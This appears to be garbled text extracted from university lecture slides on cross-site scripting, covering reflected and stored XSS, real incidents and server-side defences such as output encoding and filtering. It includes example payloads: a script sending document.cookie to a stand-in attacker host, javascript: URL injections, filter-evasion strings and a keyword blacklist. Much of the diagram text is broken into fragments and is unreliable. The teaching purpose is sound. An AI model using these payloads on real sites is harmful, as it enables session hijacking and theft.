Professional Documents
Culture Documents
CS 142
Victim client 4
Attack Server
clic
k on
l
ech ink
ou
ser
i np u
t
Victim Server
http://victim.com/search.php ? term =
apple
Bad input
Consider link:
(properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
http://badguy.com?cookie = +
document.cookie ) </script>
Attack Server
ink
l
d
a
ts b
e
g
r
u se
www.attacker.com
http://victim.com/search.php ?
term = <script> ... </script>
Victim client
use
r
clic
ks o
n lin
vict
k
im
ech
inpu
oe s
t
u se
www.victim.com
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
Victim Server
What is XSS?
An XSS vulnerability is present when an
attacker can inject scripting code into
pages generated by a web application.
Methods for injecting malicious code:
User Victim
Attack Server
clic
k on
l
ech ink
ou
ser
i np u
t
Server Victim
2006 Example
Vulnerability
Attackers contacted users via email and fooled them into
accessing a particular URL hosted on the legitimate PayPal
website.
Injected code redirected PayPal visitors to a page warning
users their accounts had been compromised.
Victims were then redirected to a phishing site and
prompted to enter sensitive financial data.
Source: http://www.acunetix.com/news/paypal.htm
http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-i
http://website.com/path/to/file.pdf#s=javascript:alert(
xss);)
Security Bulletin
Update to Dreamweaver and Contribute to address potential
cross-site scripting vulnerabilities
Release date: January 16, 2008
Vulnerability identifier: APSB08-01
CVE number: CVE-2007-6244, CVE-2007-6637
Platform: All platforms
Affected software versions: Dreamweaver CS3, Dreamweaver 8, Contribute CS3,
Contribute 4
Summary
Potential cross-site scripting vulnerabilities have been identified in
code generated by the Insert Flash Video command in Dreamweaver
and Contribute. Users who have used the Insert Flash Video
command in Dreamweaver or Contribute are recommended to
update their websites and product installations with the instructions
provided below. This update addresses an issue previously
described in Security Advisory APSA07-06.
Solution
Adobe recommends all Users who have used the Insert Flash Video
command in Dreamweaver or Contribute are recommended to
update their websites and product installations with the instructions
provided in the followinghttp://www.adobe.com/support/security/bulletins/apsb08-01.html
TechNote.
http://www.example.com/FLVPlayer_Progressive
.swf?
skinName=asfunction:getURL,javascript:alert(1
Status
)//
data
e
l
b
lua
a
v
d
5 sen
3
clic
kSend
l
ech ink on bad stuff
ou
ser
i np u
Server Victim
t
Reflect it back
User Victim
Stored XSS
ata
d
e
l
uab
l
a
v
l
ea
4 st
Attack Server
User Victim
2 re
que
3 re con st
ceiv tent
em
scri
alic
pt
Download
it
ious
Inject
Storemalicious
bad stuff
script
Server Victim
MySpace.com
(Samy worm)
<div style=background:url(javascript:alert(1))>
http://site.com/pic.jpg
results in:
HTTP/1.1 200 OK
Content-Type: image/jpeg
<html> fooled ya </html>
(despite Content-Type)
Usersupplied
applicatio
n
Strangely, this
is not the
cover of the
book ...
Defenses at server
ite
s
b
e
tw
1 visi
age
p
s
u
licio
a
m
eive
c
e
r
data
2
e
l
b
lua
a
v
d
5 sen
User Victim
Attack Server
clic
k on
l
ech ink
ou
ser
i np u
t
Server Victim
Illustrative example
http://msdn.microsoft.com/en-us/library/aa973813.aspx
Analyze application
Use Case
Scenario
Scenario
Inputs
Input
Trusted?
Scenario
Outputs
User adds
bookmark
User name,
Description,
Bookmark
No
Bookmark
Yes
written to file
Application
thanks user
User name
No
Thank you
message
page
None
User resets
Button click
bookmark file event
Yes
Output
Contains
Untrusted
Input?
Yes
N/A
Should Be Used If
HtmlEncode
UrlEncode
XmlEncode
Example/Pattern
<a
href="http://www.contoso.com">Cli
ck Here [Untrusted input]</a>
<hr noshade size=[Untrusted
input]>
<script type="text/javascript">
[Untrusted input]
</script>
<a
href="http://search.msn.com/result
s.aspx?q=[Untrusted-input]">Click
Here!</a>
<xml_tag>[Untrusted
input]</xml_tag>
<xml_tag attribute=[Untrusted
input]>Some Text</xml_tag>
Analyze application
Use Case Scenario
Scenario Inputs
Input
Scenario Output
Requires Encoding
Trusted Outputs Contains Encoding Method
?
Untruste
to Use
d Input?
Bookmark Yes
written to
file
No (output
written to
file not
Web
response)
Yes
No
Yes
N/A
HtmlEnco
de
No
Output
Contains
Untruste
d Input?
Contributo Yes
r,
descriptio
n, and link
displayed
in browser
Require
s
Encodin
g
Yes
Encoding
Method to
Use
Name HtmlEncode
Description
HtmlEncode
BookmarkLin
k - input
validation.
' '
htmlspecialchars(
"<a href='test'>Test</a>", ENT_QUOTES);
Outputs:
<a href='test'>Test</a>
ASP.NET 1.1:
Server.HtmlEncode(string)
Similar to PHP htmlspecialchars
See http://us3.php.net/htmlspecialchars
(on by default)
<img src=javascript:alert(document.cookie);>
Typical use:
Good case
<script src= ... src=...
But then
<scr<scriptipt src= ... <script src=
...
function RemoveXSS($val) {
// this prevents some character re-spacing such as <java\0script>
$val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);
// straight replacements ... prevents strings like <IMG
SRC=@avascript:
alert('XSS')>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search .= '1234567890!@#$%^&*()';
$search .= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
$val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i],
$val);
$val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with
a;
}
$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', ...);
$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', ...);
$ra = array_merge($ra1, $ra2);
$found = true; // keep replacing as long as the previous round replaced something
while ($found == true) { ...}
return $val;
}
http://kallahar.com/smallprojects/php_xss_filter_function.p
Try it at
http://kallahar.com/smallprojects/php_xss_filter_function.ph
p
java&#x09;script java	script
Instead of blocking this input, it is transformed to an attack
Need to loop and reapply filter to output until nothing found
Static Analysis
IE 8 XSS Filter
What can you do at the client?
Attack Server
ata
d
e
l
luab
a
v
d
5 sen
User Victim
clic
k
ech link on
ou
ser
inpu
t
Server Victim
http://blogs.msdn.com/ie/archive/2008/07/01/ie8-security-part-iv-the-xss-filter.aspx
Points to remember
Key concepts
Good ideas
Bad ideas
Blacklisting
Manual sanitization